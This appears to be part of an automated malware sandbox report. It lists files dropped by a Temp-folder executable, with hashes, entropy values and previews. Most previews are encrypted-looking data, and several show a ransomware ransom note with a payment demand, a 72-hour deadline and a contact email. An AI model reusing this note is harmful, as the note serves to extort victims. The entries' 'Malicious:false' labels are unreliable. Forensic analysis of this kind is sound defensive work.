                                                                                            SHA-256:425B1EE5944F45ECFEA9B78E962F1DFBF93771574FBD99B77E0DCF3FA867B947
                                                                                            SHA-512:411E1829A4672361E54108ABB5BD63D47C440061A99E8E18BD21C13BFA64C1BE8DDEEA74B758830B6BBBF39CAEF37BC84B2FE4229F096D3CEEE323A88D8558B7
                                                                                            Malicious:false
                                                                                            Preview:..I........Q..E..c..X.{o......J...7.<)#...r....'..).0....!.T..Z...O..........l.P.O.Z5$[..+....=6yBG.Ej..<4.....u.L....IV.n..S..)..n...q...?,.X..O......|..........H..]]j..;.W`GO..?.'.H.............7..GC.[....%..z..].......P....0....{6_...=.U.t.h.a.Rj0...T..zE4...g......-\..,..P=<.....S..P..7h....ec..o.^.ST....0.f...Y~......J...&.........Ya1o).%.-...4......u....9.i,.e*..b&9Y..<\..HZ..@..........0P%@.KIe.E.....1.E....u..G..N.mC..l..n..ax.+...^..cC..>BP......Q#.[.n.4=.......k......T...9..Q.K.d..l.V%.5....}....]......DK......l..c(.o.U.&....#.P.)..)....T..k./.v.vq....(......<R...x..Kz..Hp.].yjU%..X.4..~b[...A.[..;+.j....E.....91..!N......)...d...b.a-....J..Vp.0/..?..rS.1..hC-d....(...L..j.....td....-.c.g..X.1..#.....:....K.jL...!.='..\u....1\+.O...-.?...{._.N..R..K......Q.lm...u...!..T..a..R.3..uuB.....T...ft.......Q.........`.GC...U....E|/M.`U..U,.....}.....Y.\.XrC.....&...T.....Q...M{.1.+D..p.....B..rO.(+vK........$..@c.h.:...w..hj...6]
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.870603706459302
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:p8lIdw7EEF3VGWCEfAD4pCV2+ti5z+brtKgMXB7XpeweK2IKTXgS:p8ydw75FQWCSKeH+t8mrDe32IK/
                                                                                            MD5:0C995F7CC5349352C9159848C976ADEF
                                                                                            SHA1:087A4F530A6DD86484E92F7CC2AB701D440276C1
                                                                                            SHA-256:E8E37234E97F1F29A81CBC1448A8F016EFFFEB65E704E35905C252133051F278
                                                                                            SHA-512:8CAFE04525255370069C59021FA0F5D6C5128532CE13AD701DA26C1507EA5A8C05B38567EA16842C27630231DB93357EE4A7E8EAB5500624D2A3002676E6D669
                                                                                            Malicious:false
                                                                                            Preview:kt,WH}.tUs.r....|....._.8.n......zue..d.O8.....?...^....G.g....7.]...`.+.c.Y,.....6..ag...M.....V+.r../m....@'.QDt..8...x./.)X...>.m.`G......+......"SE..Qe..,.%....J{...J..H..Pl..E.+..d.D..?.`'^.sdz.B.........b,:...bB.+._\..b/.j..c>......o...g..1..Vn..'..**.,FofEg...x..s....b..N.'p;l.....wn.36.C;.U.....3V-.....V.L.2bc....$>...F...m`R...$;.2.~..1.\...'K...J[.,.o...eI4.)....7}.`...Z....}{.....]-.......#.6..R4\FS,.YPg..+..Zu........^|7X..N[... j.@.d.)=.]H.K......4...hp!\.".2.}+8(.t.e_=.....8waU.I...S.....t."..4i..TD...._.....C....{.....n(..>O.{.H..\...\..AG.\2....1p....%.....;..t+L.Z.3.b..S.&]G..2.....uSK.....RDF....:D-...c.3~..8.Gz04.#0...toX......2.$.<...6..x.Y2/.ie+.Q..g.n.9...`...-...sZl..M..x...o!Jbq....T....o.......Y6o(c..'......1._.b...m=....0W..$9....PA.N2....k_......k..........R...MH6.Q.J.r.t9.._V8..)C.....}.X#.q.\.3....1]$.P.~.3.'.Co...f.o..f.....p.}*..'....O.BC.i8..ip..s..[@.....@..!.k....-sh..Ug...5....>".....!.\U..g.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.870603706459302
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:p8lIdw7EEF3VGWCEfAD4pCV2+ti5z+brtKgMXB7XpeweK2IKTXgS:p8ydw75FQWCSKeH+t8mrDe32IK/
                                                                                            MD5:0C995F7CC5349352C9159848C976ADEF
                                                                                            SHA1:087A4F530A6DD86484E92F7CC2AB701D440276C1
                                                                                            SHA-256:E8E37234E97F1F29A81CBC1448A8F016EFFFEB65E704E35905C252133051F278
                                                                                            SHA-512:8CAFE04525255370069C59021FA0F5D6C5128532CE13AD701DA26C1507EA5A8C05B38567EA16842C27630231DB93357EE4A7E8EAB5500624D2A3002676E6D669
                                                                                            Malicious:false
                                                                                            Preview:kt,WH}.tUs.r....|....._.8.n......zue..d.O8.....?...^....G.g....7.]...`.+.c.Y,.....6..ag...M.....V+.r../m....@'.QDt..8...x./.)X...>.m.`G......+......"SE..Qe..,.%....J{...J..H..Pl..E.+..d.D..?.`'^.sdz.B.........b,:...bB.+._\..b/.j..c>......o...g..1..Vn..'..**.,FofEg...x..s....b..N.'p;l.....wn.36.C;.U.....3V-.....V.L.2bc....$>...F...m`R...$;.2.~..1.\...'K...J[.,.o...eI4.)....7}.`...Z....}{.....]-.......#.6..R4\FS,.YPg..+..Zu........^|7X..N[... j.@.d.)=.]H.K......4...hp!\.".2.}+8(.t.e_=.....8waU.I...S.....t."..4i..TD...._.....C....{.....n(..>O.{.H..\...\..AG.\2....1p....%.....;..t+L.Z.3.b..S.&]G..2.....uSK.....RDF....:D-...c.3~..8.Gz04.#0...toX......2.$.<...6..x.Y2/.ie+.Q..g.n.9...`...-...sZl..M..x...o!Jbq....T....o.......Y6o(c..'......1._.b...m=....0W..$9....PA.N2....k_......k..........R...MH6.Q.J.r.t9.._V8..)C.....}.X#.q.\.3....1]$.P.~.3.'.Co...f.o..f.....p.}*..'....O.BC.i8..ip..s..[@.....@..!.k....-sh..Ug...5....>".....!.\U..g.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.8500452513955015
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:KxWfISgsRS8yANsmZnWao8gsqKobnO1bW8wHEahXkt3sbzklimw:KgfISgV8lNsmdo8gsqJAC8wHH03Qkw
                                                                                            MD5:7CBA6B4CFF0FC053264BBD90DF4B375A
                                                                                            SHA1:92A162C52F0480629CD531A7F134D8CD3C82DAA2
                                                                                            SHA-256:7A28285CD840ACC68A8E4596D0D664E128BF0277B11E9796EF90C0816F0601F0
                                                                                            SHA-512:39D001A9538B02A4B687E5BDBAABCBF4A0175489C3212E00EED3F2488508868D8F282ED2A91E81D3868663290F76DD5780216530FF777D4E2F7C22C6E5E3AA1C
                                                                                            Malicious:false
                                                                                            Preview:Y/..7..J.Er...B..[.0..../....m 8.&......?E...l1.tL'P.L...Z...3....F*.....Ji.r.%f<.3.<.<......_+...[Ng.......HG.$GT..)}5..S......e.Z#Bm/.0......0M....g,.......d.3../h.m.m.B....Q.`..%C..JJ0..J.*^e.""P....h..w.5..b.K.iV.h".-.Q?6.yN._...o..U.>!.....?4..;.#.p....Mu...i%..rG:B.l*.FI.f..F.(...=Op..0..4.<.+a...n...mp.E....$..2..`..O......M.".X"k<;.0w......+.2..~r;.,....p....v!E...d.5T..n.*..N......n.)....zGs..9..b....p$.7....DaD..*...D!..W..Q..z...J.Z...j?..._.7T.0.]..9^.w...Fw.4.n...b...IS?Z.N..\^y...e2..q.....D.Ar.9.B...8[.......7t...&....m...X?.....tsd2.l....r.=.n=6.OU.T..AkB..D.(X0.-...o.U...S/I.4f.G.].r.A.k_.M`.L../...R... .....^-n........#s}......-..,d..9.]O..b*3?..80....N.q^..m.E.dQ%kb.\...k.8.C....q[c.;...m..o...5..3..x....(..c9L...x...=....8'#...j...X....u4..a.J...}...2b-.D..d.p.g1D.A..]...Edy.a.U.NK$h......."Kx.....}.T M.p..k.c.s..o5._c.f....1.....P...'.'.......$."$...&...h.....J"IH*.\....y.....y.`t..IK~ocE.#q..'jX....uZu....6,|..{
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.8500452513955015
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:KxWfISgsRS8yANsmZnWao8gsqKobnO1bW8wHEahXkt3sbzklimw:KgfISgV8lNsmdo8gsqJAC8wHH03Qkw
                                                                                            MD5:7CBA6B4CFF0FC053264BBD90DF4B375A
                                                                                            SHA1:92A162C52F0480629CD531A7F134D8CD3C82DAA2
                                                                                            SHA-256:7A28285CD840ACC68A8E4596D0D664E128BF0277B11E9796EF90C0816F0601F0
                                                                                            SHA-512:39D001A9538B02A4B687E5BDBAABCBF4A0175489C3212E00EED3F2488508868D8F282ED2A91E81D3868663290F76DD5780216530FF777D4E2F7C22C6E5E3AA1C
                                                                                            Malicious:false
                                                                                            Preview:Y/..7..J.Er...B..[.0..../....m 8.&......?E...l1.tL'P.L...Z...3....F*.....Ji.r.%f<.3.<.<......_+...[Ng.......HG.$GT..)}5..S......e.Z#Bm/.0......0M....g,.......d.3../h.m.m.B....Q.`..%C..JJ0..J.*^e.""P....h..w.5..b.K.iV.h".-.Q?6.yN._...o..U.>!.....?4..;.#.p....Mu...i%..rG:B.l*.FI.f..F.(...=Op..0..4.<.+a...n...mp.E....$..2..`..O......M.".X"k<;.0w......+.2..~r;.,....p....v!E...d.5T..n.*..N......n.)....zGs..9..b....p$.7....DaD..*...D!..W..Q..z...J.Z...j?..._.7T.0.]..9^.w...Fw.4.n...b...IS?Z.N..\^y...e2..q.....D.Ar.9.B...8[.......7t...&....m...X?.....tsd2.l....r.=.n=6.OU.T..AkB..D.(X0.-...o.U...S/I.4f.G.].r.A.k_.M`.L../...R... .....^-n........#s}......-..,d..9.]O..b*3?..80....N.q^..m.E.dQ%kb.\...k.8.C....q[c.;...m..o...5..3..x....(..c9L...x...=....8'#...j...X....u4..a.J...}...2b-.D..d.p.g1D.A..]...Edy.a.U.NK$h......."Kx.....}.T M.p..k.c.s..o5._c.f....1.....P...'.'.......$."$...&...h.....J"IH*.\....y.....y.`t..IK~ocE.#q..'jX....uZu....6,|..{
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.837326464277483
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:d6s1m7VuEvMVgylpfkKSvbZiscV6vgIkC30MxklBXH5QLG5oycNU/AujgC1v2F:d5UPEtYKSv7cV6vgzwWlBXHZoycNIhMX
                                                                                            MD5:A88190176E3F4D2B6258EEA288227197
                                                                                            SHA1:1CF1B4C5EE4F68F7B09A6D9512D4843A5C093A76
                                                                                            SHA-256:21BA3A772ED1C8B3A2B2A9556A372E10419B5FE43553326177DCDFF116B52A6D
                                                                                            SHA-512:042254409C2DBEF42842AE0796B15831A1E12B3178693267F2F60623D26B4856B00D6D0618A9786113D11234C18CA3A672DD41EA0310872F5BB2DF6DE336E865
                                                                                            Malicious:false
                                                                                            Preview:.G.......,$1.z......^y...pZ8y.......!$^yw....[.H.;E...icF^.....5.G..dh....mv`k.56]V...k.F.6f..a0^5i... ......9.j..PU..h/......()..R.......)..nD.(..R.4t.........."..+.SR..OG.[.9.....4...D.g...'..V......s.Q.>.+}..}&O..]..^f....2I.Sz.,K.,.^...1n.."K&...[#......z....nW..}..,.+I.|IU.6r....t>..#z.<.~.O.9...Xz.....JF..a..a.+..h.`.....s..M.,|^.w....x./Z....B|c|B..}..v..B.._W..S.*/.Bh...|.8.Z..&.....<L....*...n................H.[O.z.@w..,..DU...2O,q..4..HMR.8.z2...._0..t..>....^.A..J.a.o...KwX...<..#x.....1>y.E...g.ni._x..........4s....!N..[<..... ...]"A..5.K<.bEx....B....\)........vF..y..*...cM..>I.KA.J....qQ.h^.a.MB..D..L7..42g..r..Y.5.X=.....k..0.....w2~.O.. .j....t..rS.Iuz...Z.?Nntld....e...|.C...]W...dU)/.....^V..A.m.T.cQ....yoO...r....X.f..*c.Q..O...0........nA...m...x.?..(.W.+.}.,.l,..R58..S.....]Yej_/PcC....=.l.kx.+L.v..._..1!...dt...B.q.*fKWx..{..n.,M..m...uuk=.*B0|!.@KWC.G...x..o]..Ww..}Y.m.6.s..;N.m. ?..@.X.K...b#..R...Q..v..F..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.837326464277483
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:d6s1m7VuEvMVgylpfkKSvbZiscV6vgIkC30MxklBXH5QLG5oycNU/AujgC1v2F:d5UPEtYKSv7cV6vgzwWlBXHZoycNIhMX
                                                                                            MD5:A88190176E3F4D2B6258EEA288227197
                                                                                            SHA1:1CF1B4C5EE4F68F7B09A6D9512D4843A5C093A76
                                                                                            SHA-256:21BA3A772ED1C8B3A2B2A9556A372E10419B5FE43553326177DCDFF116B52A6D
                                                                                            SHA-512:042254409C2DBEF42842AE0796B15831A1E12B3178693267F2F60623D26B4856B00D6D0618A9786113D11234C18CA3A672DD41EA0310872F5BB2DF6DE336E865
                                                                                            Malicious:false
                                                                                            Preview:.G.......,$1.z......^y...pZ8y.......!$^yw....[.H.;E...icF^.....5.G..dh....mv`k.56]V...k.F.6f..a0^5i... ......9.j..PU..h/......()..R.......)..nD.(..R.4t.........."..+.SR..OG.[.9.....4...D.g...'..V......s.Q.>.+}..}&O..]..^f....2I.Sz.,K.,.^...1n.."K&...[#......z....nW..}..,.+I.|IU.6r....t>..#z.<.~.O.9...Xz.....JF..a..a.+..h.`.....s..M.,|^.w....x./Z....B|c|B..}..v..B.._W..S.*/.Bh...|.8.Z..&.....<L....*...n................H.[O.z.@w..,..DU...2O,q..4..HMR.8.z2...._0..t..>....^.A..J.a.o...KwX...<..#x.....1>y.E...g.ni._x..........4s....!N..[<..... ...]"A..5.K<.bEx....B....\)........vF..y..*...cM..>I.KA.J....qQ.h^.a.MB..D..L7..42g..r..Y.5.X=.....k..0.....w2~.O.. .j....t..rS.Iuz...Z.?Nntld....e...|.C...]W...dU)/.....^V..A.m.T.cQ....yoO...r....X.f..*c.Q..O...0........nA...m...x.?..(.W.+.}.,.l,..R58..S.....]Yej_/PcC....=.l.kx.+L.v..._..1!...dt...B.q.*fKWx..{..n.,M..m...uuk=.*B0|!.@KWC.G...x..o]..Ww..}Y.m.6.s..;N.m. ?..@.X.K...b#..R...Q..v..F..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.857634880557789
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:89OL81GEsHUs/C5ugb1cpQ65yofP9BR2JQXyo3BPcWuMKpuR:8D5eAuYcpQ6kofl8QJ3VcW6O
                                                                                            MD5:1E435881F28C10E0F19C0983F818C020
                                                                                            SHA1:C6AF3D199D9D95E2A85BCA12914B37463678CD15
                                                                                            SHA-256:3681511B6A6A07FF62598FA825E91E3670E43FCCB5D3C053A67F2A9F55C4C114
                                                                                            SHA-512:8D985E415F609E53A03CED0C17775206E33079ED7729D7DC49EF80389D22DFBD75CED05737C258E2B8DFA1C23F3331C907B3DB6DCEFD2F73D2A8D1BC1DDA51D9
                                                                                            Malicious:false
                                                                                            Preview:..MB..q..e........\}..e.....5.;X.eU..-.B..f..-.%9......B.1.8s..&..6.....{3W........g.{/.)^.d.....2k':0h.k..@.P.^.N.Nu..4._'[.6.vE...I..H.eS..;...WX...UU...s...P.Q..:c....Z..a.r.PE...W....\5.!.u.e......p7(}..\..~mM.H...h..z{5..r.`...,..C.....Kt0.K.*K........t.$..RV.$. p6i.5.e{.Mv.......`.....1.......6..6..$......1....f.i..".....AK.._....%9 ..I.w.....M.YA.<i..fF...V.(.mG....J..pl.(.....Z.'...@s-..j#?.T.+?.6.t...6.J&D].Y...G.#.(..L<O..[.;f..r.9.s...O.Wz.B....i.........#/P......N|.....JQ.........H.7f.=d....dR.q.p..(.....r.e.~3......|....Q....9x......f[f..i..^kPW<r./..n.}d\..C*..c.H.:\.#...X..s.K"O..9cS...I.%.T.\....."}.L..W.?.b.....NJ..gx..... ...r../X....r.....1._..{*6.#..c.F..R.~....u.>>3V.K\..e;.q.y.E...b.>....fQ......s.c....m.U...+Xh.5...,nI.2...]......I..k..E'.....'.N.O......L.....!.QX....wa..R...A...].k.e}VHuL.......X.........^u(.'..>y..C.Yl5W...7...<.hz...-.T..`e.......\...X8D..i{.mL.7..:.$.:.M...=l.h.P........t..V..P.y..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.857634880557789
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:89OL81GEsHUs/C5ugb1cpQ65yofP9BR2JQXyo3BPcWuMKpuR:8D5eAuYcpQ6kofl8QJ3VcW6O
                                                                                            MD5:1E435881F28C10E0F19C0983F818C020
                                                                                            SHA1:C6AF3D199D9D95E2A85BCA12914B37463678CD15
                                                                                            SHA-256:3681511B6A6A07FF62598FA825E91E3670E43FCCB5D3C053A67F2A9F55C4C114
                                                                                            SHA-512:8D985E415F609E53A03CED0C17775206E33079ED7729D7DC49EF80389D22DFBD75CED05737C258E2B8DFA1C23F3331C907B3DB6DCEFD2F73D2A8D1BC1DDA51D9
                                                                                            Malicious:false
                                                                                            Preview:..MB..q..e........\}..e.....5.;X.eU..-.B..f..-.%9......B.1.8s..&..6.....{3W........g.{/.)^.d.....2k':0h.k..@.P.^.N.Nu..4._'[.6.vE...I..H.eS..;...WX...UU...s...P.Q..:c....Z..a.r.PE...W....\5.!.u.e......p7(}..\..~mM.H...h..z{5..r.`...,..C.....Kt0.K.*K........t.$..RV.$. p6i.5.e{.Mv.......`.....1.......6..6..$......1....f.i..".....AK.._....%9 ..I.w.....M.YA.<i..fF...V.(.mG....J..pl.(.....Z.'...@s-..j#?.T.+?.6.t...6.J&D].Y...G.#.(..L<O..[.;f..r.9.s...O.Wz.B....i.........#/P......N|.....JQ.........H.7f.=d....dR.q.p..(.....r.e.~3......|....Q....9x......f[f..i..^kPW<r./..n.}d\..C*..c.H.:\.#...X..s.K"O..9cS...I.%.T.\....."}.L..W.?.b.....NJ..gx..... ...r../X....r.....1._..{*6.#..c.F..R.~....u.>>3V.K\..e;.q.y.E...b.>....fQ......s.c....m.U...+Xh.5...,nI.2...]......I..k..E'.....'.N.O......L.....!.QX....wa..R...A...].k.e}VHuL.......X.........^u(.'..>y..C.Yl5W...7...<.hz...-.T..`e.......\...X8D..i{.mL.7..:.$.:.M...=l.h.P........t..V..P.y..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.846621132534695
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:2+t3Z9drVDStQk4NhtXWNwJa72O34ZNTDdAOzFm1rRt3LH:283trFSOk47tXXq2y4LTDrzFmNjLH
                                                                                            MD5:574EFC9034ACA3B827ABCBE5F5493482
                                                                                            SHA1:028CDF368B33984E1292149E058FCBD121E7AD2C
                                                                                            SHA-256:04B8444FFAD0BA651EF37DD6602ED3F5E33258E292172E6B27F5D692924B2808
                                                                                            SHA-512:A881B244BF2B8162F1E2279218610E24FFD270DA2B6D69118C38C15B46240FCD23455AEE7DFF4BF1F660C2E0B8DB822683D7D0D08E2B9ABAD14DEA965CF6502D
                                                                                            Malicious:false
                                                                                            Preview:I.K...cr.T$R..x]{.fu3..9U.&...G........p..E...e...........D.......Ljate78...#C.../l.?..SX...khSz...Lp+..j..............Bq..S.M......z.S.'._...........C...............c...R...>.x.+..........sDc.......a.,.....u.<.t."..{..(..i.VG-...!|.@1.(.~.g.<9J.u......6..j...$b.5.E.+OF?..\<..D_...w#v$....S...{e.....<H..z2j....M)B_. ...S...+...\/..[c...z._F. ./..k7....N...o.H..x.vC.4 3.4.~.R.8....p.;.n..W&...,.......b...x..S-....rl.Vl...4..p..\..ji.[......r.......Z$....(...z.Y.........AG....Ev<.d.Zl..bGXl%."d.......kQ..G!O..Gc/N..0.K|.W.#.@..2.&..v.;^....O...V0....l-.. ...sf.4..=uv.......g...i=....a>.l]..S..~..K..y.E..7.<Ts.z.|"5.m.K..s|0'N&;..yi.].@.}.\.1H!.b..s.g;.g.,fm...U.............H.H..Z.q..9.g..5[.E..o...t}..........e.v).3B...%./R.g.... .....^......p.6E.b...Ob.:...kk...I;. Q*|...eS...O.....@..*e.f2~.a%R.RU .*.c*.)..E....W]X#..w.l...~.i.....&.e.]....r...E.pZ.../.+..;@b .RxJ..\...l;..|Hy.1y@....$..T.q.W..s.7}...-..r..JP)..B.@..O..s.)...<...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.846621132534695
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:2+t3Z9drVDStQk4NhtXWNwJa72O34ZNTDdAOzFm1rRt3LH:283trFSOk47tXXq2y4LTDrzFmNjLH
                                                                                            MD5:574EFC9034ACA3B827ABCBE5F5493482
                                                                                            SHA1:028CDF368B33984E1292149E058FCBD121E7AD2C
                                                                                            SHA-256:04B8444FFAD0BA651EF37DD6602ED3F5E33258E292172E6B27F5D692924B2808
                                                                                            SHA-512:A881B244BF2B8162F1E2279218610E24FFD270DA2B6D69118C38C15B46240FCD23455AEE7DFF4BF1F660C2E0B8DB822683D7D0D08E2B9ABAD14DEA965CF6502D
                                                                                            Malicious:false
                                                                                            Preview:I.K...cr.T$R..x]{.fu3..9U.&...G........p..E...e...........D.......Ljate78...#C.../l.?..SX...khSz...Lp+..j..............Bq..S.M......z.S.'._...........C...............c...R...>.x.+..........sDc.......a.,.....u.<.t."..{..(..i.VG-...!|.@1.(.~.g.<9J.u......6..j...$b.5.E.+OF?..\<..D_...w#v$....S...{e.....<H..z2j....M)B_. ...S...+...\/..[c...z._F. ./..k7....N...o.H..x.vC.4 3.4.~.R.8....p.;.n..W&...,.......b...x..S-....rl.Vl...4..p..\..ji.[......r.......Z$....(...z.Y.........AG....Ev<.d.Zl..bGXl%."d.......kQ..G!O..Gc/N..0.K|.W.#.@..2.&..v.;^....O...V0....l-.. ...sf.4..=uv.......g...i=....a>.l]..S..~..K..y.E..7.<Ts.z.|"5.m.K..s|0'N&;..yi.].@.}.\.1H!.b..s.g;.g.,fm...U.............H.H..Z.q..9.g..5[.E..o...t}..........e.v).3B...%./R.g.... .....^......p.6E.b...Ob.:...kk...I;. Q*|...eS...O.....@..*e.f2~.a%R.RU .*.c*.)..E....W]X#..w.l...~.i.....&.e.]....r...E.pZ.../.+..;@b .RxJ..\...l;..|Hy.1y@....$..T.q.W..s.7}...-..r..JP)..B.@..O..s.)...<...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
